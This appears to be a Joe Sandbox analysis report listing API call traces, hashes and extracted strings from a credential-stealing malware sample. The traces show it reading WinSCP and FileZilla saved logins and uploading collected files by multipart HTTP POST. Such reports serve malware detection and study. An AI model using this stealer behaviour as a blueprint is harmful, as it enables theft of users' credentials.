                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                                  • Instruction ID: bdf7840bdb5d23557ca24adf21b56bf8b998ac4781c5fcf1cdb6254bbd2a154a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34D05EF07012206BE720AB69BC5DB873A9CAF157A1F440031F986C6260D3B888C1C699
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                                                  • Instruction ID: b80074a2059a1f3756ce7d307e25dbd51f94fcbc115dd2ec99a1d9f33b013242
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66D0A7F17012106BD6206764BC4DBC7395C9F05760F440021F981C62A0C27448C1C695
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2046fac39060b3b77728db7903071d1a84601050c9d96548d090f17622b8ad63
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AD0237160012097C7002B18FD4D98737545FC1708F010111F745B7151D135996E87DF
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D1CD
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D21F
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040D244
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D44B
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D457
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,77355E70), ref: 0040D461
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D468
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D47B
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D485
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040D4B6
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040D4CE
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D50C
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D559
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D5BB
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D5C3
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D5D4
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D5E9
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0040D5F3
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D602
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D60A
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D614
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040D65C
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000), ref: 0040D883
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000), ref: 0040D9A7
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Security, xrefs: 0040DA77
                                                                                                                                                                                                                                                                                                  • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040DA4B
                                                                                                                                                                                                                                                                                                  • UseMasterPassword, xrefs: 0040DA72
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$??3@Allocstrcpy_s$lstrlen$memset$strlen$_invalid_parameter_noinfo_noreturnstrchr$CloseOpenValue
                                                                                                                                                                                                                                                                                                  • String ID: Security$Software\Martin Prikryl\WinSCP 2\Configuration$UseMasterPassword

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040DF2D
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(0042150A,0042150A,0042150A,0042150A,?,00000028,0042150A), ref: 0040DF71
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0040DF7F
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040DF99
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E0BF
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E0CA
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E0F6
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E101
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E12D
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E138
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E164
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E173
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000,0000001B,-000000DE), ref: 0040E1A5
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E1D1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcpy$AllocLocal$File$CreateHeaplstrcat$CloseFolderFreeHandleObjectPathProcessReadSingleSizeSleepThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00403290
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 004032CA
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 004032FA
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,Content-Disposition: form-data; name=",?,?,00421505,?,?,?), ref: 0040364A
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00403660
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040366C
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00403679
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040369B
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00411952,00000000), ref: 004036A2
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 004036BC
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,00000014), ref: 004036C7
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 004036E1
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403703
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403708
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403739
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040374F
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040375D
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 004037A4
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 004037D6
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00403823
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403848
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403850
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00403859
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00403866
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$Heap$lstrcpy$Process$Httpmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackErrorExitFreeInfoLastOptionQuerySendSleep
                                                                                                                                                                                                                                                                                                  • String ID: ------$"$--$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$block$build_id$file_data$file_name$https$token

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,Content-Disposition: form-data; name=",?,?,00421505), ref: 00403E15
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00403E28
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00403E34
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403E41
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00403E66
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00403E6B
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403E82
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA4
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA9
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403ED9
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403EFD
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F22
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F2C
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00403F38
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00403F41
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00417786), ref: 00403F4A
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F74
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F7E
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000000C7,?), ref: 00403F93
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000000C7,?), ref: 00403FE6
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00403FFA
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404007
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404011
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,0042150A,00000000,?,?,?,?,?,?,?), ref: 0040406D
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040407C
